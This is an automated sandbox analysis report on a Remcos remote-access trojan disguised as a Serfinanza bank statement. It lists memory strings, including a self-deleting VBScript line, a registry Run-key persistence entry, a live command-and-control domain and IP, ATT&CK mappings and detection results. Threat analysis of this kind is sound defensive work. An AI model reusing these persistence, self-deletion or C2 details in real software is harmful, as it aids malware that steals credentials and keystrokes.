Source: PxxoServicesTrialNet1.exe, 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
Source: PxxoServicesTrialNet1.exe, 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, String found in binary or memory: Remcos_Mutex_Inj
Source: PxxoServicesTrialNet1.exe, 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
Source: PxxoServicesTrialNet1.exe, 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, String found in binary or memory: Remcos_Mutex_Inj
Source: PxxoServicesTrialNet1.exe, 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
Source: PxxoServicesTrialNet1.exe, String found in binary or memory: Remcos_Mutex_Inj
Source: PxxoServicesTrialNet1.exe, 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
Source: PxxoServicesTrialNet1.exe, 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: Remcos_Mutex_Inj
Source: PxxoServicesTrialNet1.exe, 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
Yara detected Remcos RAT
Source: Yara match, file source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 4480, type: MEMORY
Source: Yara match, file source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 7144, type: MEMORY
Source: Yara match, file source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 5772, type: MEMORY
Source: Yara match, file source: Process Memory Space: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880, type: MEMORY
Source: Yara match, file source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 6788, type: MEMORY
Source: Yara match, file source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, Code function: cmd.exe (7_2_00402B8A)
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, Code function: cmd.exe (25_2_00402B8A)

          Mitre Att&ck Matrix

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain
Execution: Scripting 11, Native API 1, Command and Scripting Interpreter 1, Service Execution 2, Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell, Unix Shell
Persistence: Application Shimming 1, Windows Service 1, Registry Run Keys / Startup Folder 1, Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
Privilege Escalation: Application Shimming 1, Access Token Manipulation 1, Windows Service 1, Process Injection 222, Registry Run Keys / Startup Folder 1, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
Defense Evasion: Disable or Modify Tools 1, Deobfuscate/Decode Files or Information 1, Scripting 11, Obfuscated Files or Information 2, Software Packing 1, Timestomp 1, Masquerading 1, Virtualization/Sandbox Evasion 161, Access Token Manipulation 1, Process Injection 222, Right-to-Left Override, Rename System Utilities
Credential Access: OS Credential Dumping 1, Input Capture 121, Credentials In Files 2, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging
Discovery: System Time Discovery 1, Account Discovery 1, System Service Discovery 1, File and Directory Discovery 3, System Information Discovery 43, Query Registry 1, Security Software Discovery 321, Virtualization/Sandbox Evasion 161, Process Discovery 3, Application Window Discovery 1, System Owner/User Discovery 1, Remote System Discovery 1
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media, Component Object Model and Distributed COM
Collection: Archive Collected Data 1, Input Capture 121, Clipboard Data 2, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium, Exfiltration over USB
Command and Control: Ingress Tool Transfer 11, Encrypted Channel 1, Non-Standard Port 1, Remote Access Software 1, Non-Application Layer Protocol 1, Application Layer Protocol 11, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: System Shutdown/Reboot 1, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery

          Behavior Graph

Behavior Graph ID: 399743; Sample: EXTRACTOSERFINANZA989543704031499704092798964.exe; Start date: 29/04/2021; Architecture: WINDOWS; Score: 100
Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

Process tree recovered from the graph (the rendered graph itself is not reproduced):

• EXTRACTOSERFINANZA989543704031499704092798964.exe (started); signatures: Contains functionality to steal Chrome passwords or cookies; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes; Contains functionality to steal Firefox passwords or cookies
  • EXTRACTOSERFINANZA989543704031499704092798964.exe (child); dropped: C:\Users\user\...\PxxoServicesTrialNet1.exe (PE32), PxxoServicesTrialN...exe:Zone.Identifier (ASCII)
    • wscript.exe
      • cmd.exe
        • PxxoServicesTrialNet1.exe; signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to steal Chrome passwords or cookies; 5 other signatures
          • PxxoServicesTrialNet1.exe; contacts databasepropersonombrecomercialideasearchwords.services 190.255.84.57, port 3521, COLOMBIATELECOMUNICACIONESSAESPCO, Colombia
          • cmd.exe
            • conhost.exe
            • timeout.exe
          • PxxoServicesTrialNet1.exe
          • WerFault.exe
        • conhost.exe
  • cmd.exe
    • conhost.exe
    • timeout.exe
  • WerFault.exe; contacts 192.168.2.1 (unknown)
• PxxoServicesTrialNet1.exe (started); dropped: C:\Users\...\PxxoServicesTrialNet1.exe.log (ASCII); signatures: Hides threads from debuggers; Injects a PE file into a foreign processes
  • cmd.exe
    • conhost.exe
    • timeout.exe
• PxxoServicesTrialNet1.exe (started)
  • cmd.exe
    • conhost.exe
    • timeout.exe
  • PxxoServicesTrialNet1.exe
  • PxxoServicesTrialNet1.exe
  • WerFault.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
EXTRACTOSERFINANZA989543704031499704092798964.exe | 11% | ReversingLabs | Win32.Trojan.Barys
EXTRACTOSERFINANZA989543704031499704092798964.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe | 11% | ReversingLabs | Win32.Trojan.Barys

          Unpacked PE Files

Source | Detection | Scanner | Label
24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack | 100% | Avira | BDS/Backdoor.Gen
7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack | 100% | Avira | BDS/Backdoor.Gen
16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack | 100% | Avira | BDS/Backdoor.Gen
33.2.PxxoServicesTrialNet1.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack | 100% | Avira | BDS/Backdoor.Gen
25.2.PxxoServicesTrialNet1.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack | 100% | Avira | BDS/Backdoor.Gen
1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack | 100% | Avira | BDS/Backdoor.Gen
16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack | 100% | Avira | BDS/Backdoor.Gen
24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack | 100% | Avira | BDS/Backdoor.Gen

          Domains

Source | Detection | Scanner | Label
databasepropersonombrecomercialideasearchwords.services | 13% | Virustotal |

          URLs

Source | Detection | Scanner | Label
databasepropersonombrecomercialideasearchwords.services | 13% | Virustotal |
databasepropersonombrecomercialideasearchwords.services | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
databasepropersonombrecomercialideasearchwords.services | 190.255.84.57 | true | true | | unknown

          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
databasepropersonombrecomercialideasearchwords.services | true | 13%, Virustotal; Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.743843983.0000000005530000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp | false | | high

                                      Contacted IPs


                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
190.255.84.57 | databasepropersonombrecomercialideasearchwords.services | Colombia | 3816 | COLOMBIATELECOMUNICACIONESSAESPCO | true

                                      Private

                                      IP
                                      192.168.2.1

                                      General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 399743
Start date: 29.04.2021
Start time: 06:02:03
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 11s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: EXTRACTOSERFINANZA989543704031499704092798964.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@45/17@5/2
EGA Information: Failed
                                      HDC Information:
                                      • Successful, ratio: 30.8% (good quality ratio 18.5%)
                                      • Quality average: 44.4%
                                      • Quality standard deviation: 42%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 100
                                      • Number of non-executed functions: 261
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      • Excluded IPs from analysis (whitelisted): 52.113.196.254, 13.107.3.254, 13.107.246.254, 104.42.151.234, 92.122.145.220, 104.43.139.144, 20.50.102.62, 92.122.213.249, 92.122.213.247, 52.155.217.156, 20.54.26.129
                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                      Simulations

                                      Behavior and APIs

                                      Time | Type | Description
                                      06:03:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MservicesOrg2 "C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe"
                                      06:03:09 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MservicesOrg2 "C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe"
                                      06:03:12 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
                                      06:03:20 | API Interceptor | 801x Sleep call for process: PxxoServicesTrialNet1.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      Match: databasepropersonombrecomercialideasearchwords.services
                                      Associated Sample Name / URL | Detection | Context
                                      32657046_pdf.exe | malicious | 190.255.84.57
                                      6565426875_p.exe | malicious | 186.169.38.241
                                      4831902122_p.exe | malicious | 186.169.38.241
                                      8992538102_p.exe | malicious | 186.169.38.241
                                      9604_pdf.exe | malicious | 186.169.38.241
                                      Factura Serfinanza089768553548090985869814228.exe | malicious | 186.169.38.241
                                      EXTRACTOSERFINANZA894978636268808051252452885.exe | malicious | 186.169.38.241
                                      EXTRACTOSERFINANZA149952705997730013733597462.exe | malicious | 186.169.38.241
                                      Factura Serfinanza015523916818153570120365653.exe | malicious | 186.169.38.241
                                      Factura Serfinanza053176011500426549564067806.exe | malicious | 186.169.38.241
                                      Factura Serfinanza049678941875683878450087827.exe | malicious | 186.169.38.241
                                      51121122_pdf.exe | malicious | 190.255.93.130
                                      3677_pdf.exe | malicious | 190.255.93.130
                                      Factura Serfinanza095207277561125631669632022.exe | malicious | 190.255.93.130
                                      Factura Serfinanza075728689544681589138450755.exe | malicious | 190.255.93.130
                                      Factura Serfinanza034712604259512713576096038.exe | malicious | 190.255.93.130
                                      ADJUNTOEXTRACTO590878174787097120989222355748.exe | malicious | 186.169.74.198
                                      Factura Serfinanza022880209777477966487010096.exe | malicious | 186.169.74.198
                                      SERFINANZAEXTRACTO944199837077212444587235899.exe | malicious | 186.169.74.198
                                      SERFINANZAEXTRACTO728296481601298694807375214.exe | malicious | 186.169.74.198

                                      ASN

                                      Match: COLOMBIATELECOMUNICACIONESSAESPCO
                                      Associated Sample Name / URL | Detection | Context
                                      6565426875_p.exe | malicious | 186.169.38.241
                                      4831902122_p.exe | malicious | 186.169.38.241
                                      8992538102_p.exe | malicious | 186.169.38.241
                                      9604_pdf.exe | malicious | 186.169.38.241
                                      Factura Serfinanza089768553548090985869814228.exe | malicious | 186.169.38.241
                                      EXTRACTOSERFINANZA894978636268808051252452885.exe | malicious | 186.169.38.241
                                      EXTRACTOSERFINANZA149952705997730013733597462.exe | malicious | 186.169.38.241
                                      Factura Serfinanza015523916818153570120365653.exe | malicious | 186.169.38.241
                                      Factura Serfinanza053176011500426549564067806.exe | malicious | 186.169.38.241
                                      Factura Serfinanza049678941875683878450087827.exe | malicious | 186.169.38.241
                                      rIbyGX66Op | malicious | 167.13.97.181
                                      Factura Serfinanza034712604259512713576096038.exe | malicious | 190.255.93.130
                                      aa6281eb-a31c-4e8b-a2c6-c5c03fdcbe57.exe | malicious | 200.21.51.38
                                      ADJUNTOEXTRACTO590878174787097120989222355748.exe | malicious | 186.169.74.198
                                      Factura Serfinanza022880209777477966487010096.exe | malicious | 186.169.74.198
                                      SERFINANZAEXTRACTO944199837077212444587235899.exe | malicious | 186.169.74.198
                                      SERFINANZAEXTRACTO728296481601298694807375214.exe | malicious | 186.169.74.198
                                      SERFINANZAEXTRACTO283816558547438357773985414.exe | malicious | 186.169.74.198
                                      Factura Serfinanza010714008071991847569194350.exe | malicious | 186.169.74.198
                                      EXTRACTOSERFINANZA596054271198721911813685868.exe | malicious | 186.169.74.198

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_MVLWCKDAQD5FGBB2_49c7f4ecea5ecda709bac2c317171852536834d_20f0d725_03d4bb9b\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):15176
                                      Entropy (8bit):3.793511206475218
                                      Encrypted:false
                                      SSDEEP:192:VqFNmcmHBUZMXyaKA6K+da0/u7sBS274ItWq:sFNqBUZMXyaya0/u7sBX4ItWq
                                      MD5:4CBDB4F7DD0D4C450F7E98FEA9A6C619
                                      SHA1:57D5B2242B34A721C24EF9EFE404D9A52FA2708A
                                      SHA-256:678A1E5282D41D34861E4C1652AA47DD2D5896FCBC5855FD07E8101BB786E2E9
                                      SHA-512:3393EE9DBE06BC64413CEDEB1ACCCDE69941AF305CE909A1ED08D007C7286F5A40E16D4921A38CC8BE39C0C7E42C83A5FA73829491A9FE4A7C93376326F6CF55
                                      Malicious:false
